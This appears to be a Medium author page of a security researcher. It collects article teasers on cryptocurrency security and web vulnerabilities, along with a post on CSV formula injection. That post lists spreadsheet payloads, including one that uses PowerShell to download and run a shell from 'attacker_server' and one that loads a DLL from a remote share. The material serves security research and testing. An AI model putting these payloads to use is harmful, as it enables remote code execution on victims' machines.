Photo by André François McKenzie on Unsplash

Bu yazımda son zamanlarda popüler olan bitcoin’den bahsetmeye devam edeceğim. Sosyal medya, haberler ve çevremizde sık sık duyduğumuz bir konu olan bitcoin, uzmanlara göre yeni yüz yılın dijital altını olarak tanımlanıyor. Bitcoin ile ilgili konuşulabilecek ve yazılabilecek çok fazla konu var, ben bu yazımda sizlere Bitcoin Mining veya Cloud Mining sitemlerinden bahsedeceğim.

Bitcoin’i şu şekilde tanımlıyorum: Bitcoin, 7/24 ödeme yapabileceğiniz ulaşılabilir bir online borsadır. Bu piyasanın artış ve yükselişi tamamen yatırımcıların kripto paraya talep gösterip göstermemesi ile alakalı bir konu. Talep arttıkça fiyat yükseliyor ve insanlarda kripto para borsasına yönelimi artıyor. Buna ek olarak, artık bir nevi pazarlama dünyası haline…


PayloadBox

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has…


PayloadBox

Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. …


PayloadBox

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In…


PayloadBox

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. …


In this article, I wanted to write a general article about you and cyber security. As you know, crypto coins have entered our lives quickly. However, it also brought some risks for cryptocurrency users. Every user-friendly solution brings risks with it.

But first of all, why would a person use cryptocurrency?

  • Fast Send and Low Charge Fees: It is really faster than domestic or international money transfer. Also, shipments are very low in terms of deduction fees compared to banks. You can send and receive your cryptocurrency on the weekend.
  • Investment Purpose: Crypto money increases and decreases in the stock…


Malüm konu bildiğiniz gibi AB ülkesi olmayan ülkeler için WhatsApp’ın gizlilik politikasına dair paylaşımından sonra bir çok insan farklı mesajlaşma uygulamlarına geçiş yaptı. Bu ilk deneme, ileriki zamanlarda AB ve ABD’de de bu politika uygulanacak. Durum böyle olunca Twitter hesabından Elon Musk’da konu üzerine bir tweet attı.


Kripto Para Cüzdan güvenligi nasıl sağlanır ?

Bir önceki yazımda Kripto Paralar ve Siber Güvenlik Riskleri adı başlığında bir giriş yazısı yayınlamıştım. Bu yazımda ise kripto para cüzdan cüzdan güvenliğinden bahsetmek istedim. Bildiğiniz üzere bir çok kripto para çeşiti olduğu gibi bir çok kripto para cüzdanı bulunuyor. Seçim yapmak istediğiniz de hangisini seçmeniz gerektiğini bu yazıdan sonra daha iyi karar verebilir. Kripto cüzdanları konsuda daha fazla bilgiye sahip olucaksınız.

Her şey son kullanıcıda bitiyor ve sizler için hazırladığım 10 maddeye dikkat etmenizde fayda olcağını düşünüyorum.

  1. Kullandığınız cüzdan uygulamasın web cüzdan adresini doğru adres olduğuna emin olun.
  2. Para göndermeden önce alıcı adresini bir kaç defa kontrol edin, gönderilen…


Bu yazımda sizlere ve siber güvenlik konusunda genel bir yazı yazmak istedim. Bildiğiniz üzere kripto paralar hayatımıza hızlıca giriş yaptı. Fakat bununla beraber kripto para kullanıcıları için bazı riskleri de getirdi. Her kullanıcı dostu çözüm beraberinde riskleri de getiriyor.

Ama öncelikle neden bir insan kripto para kullanır ?

  1. Hızlı Gönderme ve Düşük Kesinti Ücreti: Gerçekten yurt içi para transferi veya yurt dışı para transferine göre oldukça hızlı. Ayrıca gönderiler kesinti ücreti konusuda bankalara göre çok düşük. Hafta sonu kripto paranızı gönderip alabilirsiniz.
  2. Yatırım Amaçlı : Kripto para yıl içerisinde borsada artar ve azalır. Bu yatırımcılar için bir fırsat olabilir. Bir çok kripto para çeşiti bulunur.
  3. Gizlilik : İlk kullanıldığı…


Screenshot on CSV Injection Attack

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

Payloads :

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Sources to be read :

Examples from the real world :

References :

CSV Injection :

Cloning an Existing Repository ( Clone with HTTPS )

root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git

Cloning an Existing Repository ( Clone with SSH )

root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git

GitHub : https://github.com/payloadbox/csv-injection-payloads

Ismail Tasdelen

🎯 Security Researcher | Bug Bounty Hunter | Exploit Development | Chess Player | Code is Life | 0xBUFFDEAD | Advisor 🎯

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store